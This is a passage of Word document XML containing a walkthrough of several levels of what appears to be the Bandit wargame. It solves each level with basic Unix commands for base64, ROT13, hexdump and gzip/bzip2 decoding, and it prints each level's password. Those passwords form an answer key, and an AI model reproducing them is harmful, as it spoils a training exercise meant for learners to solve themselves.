          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>grep –regexp=^=*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0395D" w14:textId="6D163136" w:rsidR="00B16A39" w:rsidRDefault="00B16A39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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">For displaying all readable lines we need to use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>strings data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDB2E4" w14:textId="0EFAFA90" w:rsidR="00B16A39" w:rsidRDefault="00B16A39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To get the password we need to pie these commands: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>strings data.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>grep –regexp=^=*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and we can see the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F8D42" w14:textId="77777777" w:rsidR="00B16A39" w:rsidRPr="00B16A39" w:rsidRDefault="00B16A39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B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>========== password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477ACDE8" w14:textId="77777777" w:rsidR="00B16A39" w:rsidRPr="00B16A39" w:rsidRDefault="00B16A39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B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>========== isa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE746F8" w14:textId="6BFBB41F" w:rsidR="00B16A39" w:rsidRDefault="00B16A39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B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">========== </w:t>
      </w:r>
      <w:r w:rsidRPr="001E43F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40673DA7" w14:textId="7DD1173A" w:rsidR="00B16A39" w:rsidRDefault="00B16A39" w:rsidP="001E43F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16A39">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975109E" w14:textId="64131EE7" w:rsidR="00B16A39" w:rsidRDefault="00E41437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t xml:space="preserve">For decoding the file, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E41437">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>base64 -d data.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E41437">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The password is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E41437">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95786E" w14:textId="1D39FF1C" w:rsidR="00E41437" w:rsidRDefault="00E41437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54FCA545" w14:textId="5ED43595" w:rsidR="00E41437" w:rsidRDefault="00E41437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E41437">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E188DC4" w14:textId="79BC369E" w:rsidR="00E41437" w:rsidRDefault="00354787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For displaying the file context, we need to enter the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00354787">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat data.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00354787">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4488442F" w14:textId="7B849B91" w:rsidR="00354787" w:rsidRDefault="00354787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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">After reading the link </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/ROT13</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, I understood that for doing ROT-13 I need to enter the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00354787">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>tr ‘N-ZA-Mn-za-m’ ‘A-Za-z’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29510024" w14:textId="6672E486" w:rsidR="00354787" w:rsidRDefault="00354787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60B5D89F" w14:textId="67E1CEB3" w:rsidR="00354787" w:rsidRDefault="00354787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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">After piping the command, we can get the password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00354787">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat data.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00354787">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>tr ‘N-ZA-Mn-za-m’ ‘A-Za-z’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C4A63" w14:textId="71D21246" w:rsidR="00354787" w:rsidRDefault="00354787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354787">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The command output was:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470498" w:rsidRPr="00470498">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The password is </w:t>
      </w:r>
      <w:r w:rsidR="00470498" w:rsidRPr="00470498">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313F2BB" w14:textId="4F53A79B" w:rsidR="00470498" w:rsidRDefault="00470498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5751BD93" w14:textId="7D849682" w:rsidR="00470498" w:rsidRDefault="00470498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470498">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628EEF03" w14:textId="0EFE1901" w:rsidR="00470498" w:rsidRDefault="00374CBB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First,</w:t>
      </w:r>
      <w:r w:rsidR="00A57716">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I created a folder in /temp and copy the file there:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2E933" w14:textId="07FC80AD" w:rsidR="00A57716" w:rsidRDefault="00A57716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A57716">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuel199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5D537" w14:textId="39894949" w:rsidR="00374CBB" w:rsidRDefault="00374CBB" w:rsidP="0081212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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cp data.txt /tmp/samuel199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD3894" w14:textId="367CEAB1" w:rsidR="00812122" w:rsidRDefault="00812122" w:rsidP="0081212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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/samuel199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B580E35" w14:textId="5F083A5C" w:rsidR="00812122" w:rsidRDefault="00812122" w:rsidP="0081212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</w:p>
    <w:p w14:paraId="59B3D3E8" w14:textId="4DA73C0C" w:rsidR="009A78FD" w:rsidRDefault="002806B6" w:rsidP="0081212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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>First, to convert the hex</w:t>
      </w:r>
      <w:r w:rsidR="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">dump to binary I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>xxd -r data.txt data.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B2FC65" w14:textId="77777777" w:rsidR="00A44469" w:rsidRDefault="00A44469" w:rsidP="00A44469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16C91338" w14:textId="16437A2E" w:rsidR="00A44469" w:rsidRDefault="00B23E6F" w:rsidP="00A44469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Then, for decompress it I needed to how it was compressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19906942" w14:textId="0C98629B" w:rsidR="00907815" w:rsidRDefault="00B23E6F" w:rsidP="00A44469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t xml:space="preserve">I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”data.bin: gzip compressed data, was "data2.bin", last modified: Tue Oct 16 12:00:23 2018, max compression, from Unix”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5345AF95" w14:textId="21FE9562" w:rsidR="00907815" w:rsidRPr="00A44469" w:rsidRDefault="00907815" w:rsidP="0081212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change the file </w:t>
      </w:r>
      <w:r w:rsidR="007A0667">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gzip using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mv data.bin data.</w:t>
      </w:r>
      <w:r w:rsidR="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then I decompress it using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>gzip -d data.gz</w:t>
      </w:r>
      <w:r w:rsidR="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Output file name is: </w:t>
      </w:r>
      <w:r w:rsidR="00A44469" w:rsidRPr="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46F819" w14:textId="77777777" w:rsidR="009A78FD" w:rsidRPr="00812122" w:rsidRDefault="009A78FD" w:rsidP="0081212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</w:p>
    <w:p w14:paraId="0DAE6595" w14:textId="289FECEE" w:rsidR="00A44469" w:rsidRPr="00A44469" w:rsidRDefault="00A44469" w:rsidP="00A44469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Same like before, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r w:rsidR="009D0635">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44469">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data: bzip2 compressed data, block size = 900k</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617B468D" w14:textId="2466B594" w:rsidR="00A57716" w:rsidRDefault="007A0667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t xml:space="preserve">I decompress the file using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0667">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>bzip2 -d data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got output file named: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0667">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1350A23F" w14:textId="45C5D7AE" w:rsidR="007A0667" w:rsidRDefault="007A0667" w:rsidP="001E43F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0FC45B3D" w14:textId="457AA1A7" w:rsidR="009D0635" w:rsidRPr="00A44469" w:rsidRDefault="009D0635" w:rsidP="009D063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entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23E6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>file data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the following output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0635">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data.out: gzip compressed data, was "data4.bin", last modified: Tue Oct 16 12:00:23 2018, max compression, from Unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAD472" w14:textId="04B7AF94" w:rsidR="009D0635" w:rsidRPr="00A44469" w:rsidRDefault="009D0635" w:rsidP="009D063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lastRenderedPageBreak/>
        <w:t xml:space="preserve">I change the file extension to gzip using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mv data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then I decompress it using the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00907815">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>gzip -d data.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Output file name is: </w:t>
      </w:r>
